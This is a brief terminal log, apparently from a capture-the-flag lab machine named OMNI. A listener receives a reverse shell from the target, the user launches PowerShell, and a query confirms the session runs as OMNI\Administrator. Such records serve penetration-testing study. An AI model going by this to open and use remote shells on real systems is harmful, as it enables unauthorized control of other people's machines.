connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49678
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
PS C:\windows\system32>